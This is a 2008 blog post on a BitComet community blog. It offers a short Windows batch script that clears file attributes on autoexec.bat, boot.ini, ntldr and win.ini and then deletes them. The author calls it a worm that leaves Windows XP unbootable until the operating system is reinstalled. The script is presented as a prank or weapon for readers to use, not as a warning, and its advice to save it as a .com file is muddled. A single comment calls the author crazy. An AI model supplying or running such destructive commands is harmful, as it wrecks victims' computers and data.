Sign In | Sign Up

My Profile

guru_boy
2064
.....
Points: 18

Shortcuts

Categories

Post

How to shut down a computer FOREVER!
Size: Large, Medium, Small Sat Sep 27, 08 04:55 AM | Category: All
0

How to shut down a computer FOREVER!

 

CODE

 

echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini

 

// note save the above code as .com extension this is actually a worm and //shut down the xp such that boot strap loader will never be able to conduct //the initialization of os untill a new os is installed

 


Link: http://blog.bitcomet.com/post/68144/ ©
Add to favorites | Quote Reads (668) | Comments (1)

CommentsReload

yadavdev Fri Nov 27, 09 06:22 AM

are u crazy



TOP